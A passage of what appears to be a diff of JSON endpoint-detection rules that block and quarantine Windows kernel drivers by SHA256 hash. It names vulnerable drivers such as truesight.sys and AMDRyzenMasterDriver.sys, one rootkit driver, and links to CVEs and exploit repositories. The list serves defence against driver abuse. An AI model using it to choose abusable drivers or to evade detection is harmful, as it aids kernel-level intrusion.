"2026-03-23T11:45:29.981589Z", + "creation_date": "2026-03-23T11:45:29.981591Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981596Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c", + "comment": "Vulnerable Kernel Driver (aka gametersafe.sys) [https://www.loldrivers.io/drivers/1ab1ec8c-1231-4ba4-8804-4a2cda103bb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c6095eb-ab5a-50e5-a7a2-176220bbcd5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498228Z", + "creation_date": "2026-03-23T11:45:31.498231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b1feec688a8484df79de6dc686031e9820d88433efc21596a70fee47c85230f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "5c60c519-fa3e-55c9-85a6-c11b0ae59899", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141903Z", + "creation_date": "2026-03-23T11:45:31.141905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f73d9daffb0addc47f3a8ce6fa9eb189c648fc52e6cc8dca02aa10131c24179", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c67730d-ca67-5727-93a6-8f7fc7ead43b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485611Z", + "creation_date": "2026-03-23T11:45:31.485615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485625Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cb73ae30e9c53f30c40bc6305623f4cdde8c4ff5451f2b18a45314f9d9eb3d5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c6b1302-434d-57ad-b03a-dc978474cc61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141451Z", + "creation_date": "2026-03-23T11:45:31.141453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90227d20f02ebe9db8024aaf87e46af68af47a8e70ab11fd20bc6e613820c425", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c6c6697-a418-5b25-bd37-b78cb1f7d239", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610176Z", + "creation_date": "2026-03-23T11:45:29.610178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610184Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "771015b2620942919bb2e0683476635b7a09db55216d6fbf03534cb18513b20c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c7462e8-3573-5a9c-884c-f0a8ef17cdd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490208Z", + "creation_date": "2026-03-23T11:45:31.490210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490216Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "f1f2355dfd0dc06227cbc38148096e640bc9141fc9a1ceb3923e782b66a3e861", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c799527-c45e-5e28-b9be-e122e6b3145f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149203Z", + "creation_date": "2026-03-23T11:45:31.149205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c64d5088568ff05e8e16deaaa8ad5de85bc97b17ceda89d5c12ecadeade6244", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c7baf9d-0ba9-519d-9028-834f4dcb7220", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975113Z", + "creation_date": "2026-03-23T11:45:29.975115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "909de5f21837ea2b13fdc4e5763589e6bdedb903f7c04e1d0b08776639774880", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c7fd195-ed33-57e8-a711-1ee1bcc7b7b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143669Z", + "creation_date": "2026-03-23T11:45:32.143671Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "fcffb9cecbcefc399a2a08d99fcc2b797911afa26f3d69a28a139311cb61c39a", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c8da4cd-50fa-53b5-aa66-7d15a0c7313e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974367Z", + "creation_date": "2026-03-23T11:45:29.974369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c032e2abdf4f07ba42ce4559e6413387becbebb0a43c287b6d367dbb33bde751", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c8ef4f6-7d9b-5423-9703-79367a82d081", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500442Z", + "creation_date": "2026-03-23T11:45:31.500445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d63a68a6e08f1a9ba6e2053de4e4c35c79bba2809d1ec92318d1e3d1a8b8934b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c9d00eb-05e7-5e4b-9cba-d208d691443a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452310Z", + "creation_date": "2026-03-23T11:45:30.452313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7b3112b9745b766c8359d25e315975d3159935a8ddb3e3035d21ed124a9013f", + "comment": "Vulnerable Kernel Driver (aka phydmaccx64.sys) 
[https://www.loldrivers.io/drivers/96c8fe71-3acc-41bc-9402-ebd69a961d74/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c9e0b56-e26c-5008-aca4-1760ba4b334c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143770Z", + "creation_date": "2026-03-23T11:45:31.143772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04bf4f16cd0fefd8456f77f4f4b64502b570f8b685df3de419faae2389b58f5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cae8a67-2780-5f1c-93aa-77cf882f0149", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476565Z", + "creation_date": 
"2026-03-23T11:45:31.476569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476579Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7089503cc4f499b84ccec39aacbeec7bf0bdbe920b7b9e02b4122ab8efcb5add", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5caebab0-c790-5fbe-9483-2548fc515dd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820789Z", + "creation_date": "2026-03-23T11:45:30.820791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66f851b309bada6d3e4b211baa23b534165b29ba16b5cbf5e8f44eaeb3ca86ea", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cb65f2e-4fdf-5479-8674-5f7df7267593", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147205Z", + "creation_date": "2026-03-23T11:45:32.147207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13c4583048ebee27a2983feab18e6e4fdcb676f2c4f9880e6433839cc2d520bb", + "comment": "Malicious Kernel Driver (aka ProjectConfiguration.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cc0df16-ce2f-5bc7-bbc6-f0f0ba83ddd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836649Z", + "creation_date": "2026-03-23T11:45:30.836651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836657Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "019dea3bea77f17aca0748717180adfe91130448ee6c236f240931ba15d5fb12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cc6c790-d9ee-5fac-bae6-b16857b07e79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615782Z", + "creation_date": "2026-03-23T11:45:29.615783Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "543ee203b355c4cbac74d9bac71fb73c0c5c5c3afe268e2ae8ae48d61d350709", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cc85cbf-8a2b-5927-a174-6f9ff12a85d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143899Z", + "creation_date": "2026-03-23T11:45:32.143901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95fd266cc454177901cb58f4d30417c4a7caf29be62bb8649e5b8fca58823600", + "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cce8ff2-9a76-5237-9f8c-e8bab3d4c297", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969418Z", + "creation_date": "2026-03-23T11:45:29.969420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1faa125c9442b20c646411f629dd48afe2d962554c45fc4a8e2d45c1fc611b6c", + "comment": "Avast Vulnerable Driver (aka 
aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cd2dccd-5bfe-5eac-aad2-6f8a37740b7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985375Z", + "creation_date": "2026-03-23T11:45:29.985377Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985383Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3cbb2b364a494f096e68dc48cca89799ed27e6b97b17633036e363a98fd4421", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cd8ab20-6ca6-51fd-a3b5-54df642d25e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829238Z", + "creation_date": 
"2026-03-23T11:45:31.829242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829251Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc2a0bc303d27dc1f4eb71d34a46bb14d59c8a80e32f0fc3f18988076a687e1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cdecaa5-515b-5e9b-9650-8424bef83efc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497924Z", + "creation_date": "2026-03-23T11:45:31.497927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497936Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecf3f16e261a9d9f949cd60e63f7a0855ca2c8e8dfc7edc494bf7e698ac26897", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "5cf16b3e-10ae-55fe-8971-6c9e90752897", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143095Z", + "creation_date": "2026-03-23T11:45:31.143097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 